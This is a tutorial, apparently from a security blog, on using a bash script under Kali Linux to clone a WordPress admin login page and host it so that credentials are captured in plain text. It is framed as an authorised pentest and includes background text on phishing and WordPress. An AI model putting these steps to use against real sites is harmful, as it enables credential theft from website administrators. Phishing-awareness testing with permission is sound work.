Kali Linux WordPress Admin Phishing Pages
Kali Linux WordPress Admin Phishing Pages. Phishing attacks are a Social Engineering method that relies solely on human error and trickery.
Lets assume we are doing a Pentest on a popular WordPress website the admin has giving us permission to try. Also, phish information from staff members without breaking into their WordPress or gaining information from the SQLDatabases. The site admin has spent 1000’s of dollar maintaining security of his website and believes. It to be quite safe although he can’t be to sure that his staff members will compromise his website through human error.
A lot of people come to the conclusion that a user must be stupid or an idiot to fall for phishing pages. This is not the case with 1000’s of emails per day going to businesses and personal inboxs it can be quite easy to fall into the trap especially in shared inboxs with multiple staff reading and responding to messages. Phishing pages can look identical and very believable. However we don’t blame the targets as most have not had sufficient training. The Admins idea of the Pentest is not to make the staff users feel stupid for falling for the phishing pages but to educate them in order to prevent further attacks in the future.
We could use SEToolkit to clone a login page to the WordPress site but this can be unconventional if running listeners from long periods of time using the output PHP from WP-Phishing-Maker script we can store plain text, MySQL Databases etc. This Phishing method will require a Web server to host the files generated by the script. Kali Linux WordPress Admin Phishing Pages.
Linux based operating system
First of all Download WP-Phishing-Maker.
You can download WP-Phishing Maker from the following download location.
First of all we need to navigate to the script directory using cd command (change directory).
Then we will need to make the WP-Phishing-Maker bash script executable we can do this by using command chmod.
chmod +x WP-Phishin-Master
Now the bash script is ready to run from the same directory run command.
Now that WP-Phishing-Maker has loaded use options 1. Start.
The script will then prompt for a output location this can be any directory you would like save the WordPress phishing page generated by WP-Phisher-Maker. I will create a new directory inside root. Kali Linux WordPress Admin Phishing Pages.
Open up a new terminal and create an empty directory using mkdir command.
The script will now prompt for a WordPress website to clone as a phishing page. Kali Linux WordPress Admin Phishing Pages.
Choose if target is using HTTP or HTTPS and press Enter when the script has finished generating. WordPress phishing page you will see a message telling you that the pages have been completed and ready to use. .
We can now upload the Php files generated by WP-Phishing-Maker to a Webhost.
So we made a clone of a WordPress website that we own for testing purposes called Iphonegiveaway.co.uk. The idea of this type of phishing attack is to trick the website admin into logging into a fake WordPress admin panel.
We have uploaded the generated Php files from the bash scripts output directory to a shared webhost.
Demo (Don’t enter any personal information into this page.)
You will then be able to gather credentials in plain text and receive them from your FTP directory.
This tutorial is for educational purposes only attack websites you own or have permission to pentest on.
Kali Linux WordPress Admin Phishing Pages.
Phishing is the attempt to obtain sensitive information such as usernames, passwords, and credit card details (and, indirectly, money), often for malicious reasons, by disguising as a trustworthy entity in an electronic communication. The word is a neologism created as a homophone of fishing due to the similarity of using a bait in an attempt to catch a victim. According to the 2013 Microsoft Computing Safety Index, released in February 2014, the annual worldwide impact of phishing could be as high as US$5 billion. [better source needed]
Phishing is typically carried out by email spoofingor instant messaging, and it often directs users to enter personal information at a fake website, the look and feel of which are almost identical to the legitimate one. Communications purporting to be from social web sites, auction sites, banks, online payment processors or IT administrators are often used to lure victims. Phishing emails may contain links to websites that are infected with malware.
WordPress is a free and open-source content management system (CMS) based on PHP and MySQL.WordPress is installed on a web server that is either part of anInternet hosting service or a network host in its own right. The first case may be a service like WordPress.com, for example, and the second case could be a computer running the software package WordPress.org. A local computer may be used for single-user testing and learning purposes. Features include a plugin architecture and a template system. WordPress was used by more than 27.5% of the top 10 million websites as of February 2017. WordPress is reportedly the most popular website management or blogging system in use on the Web, supporting more than 60 million websites.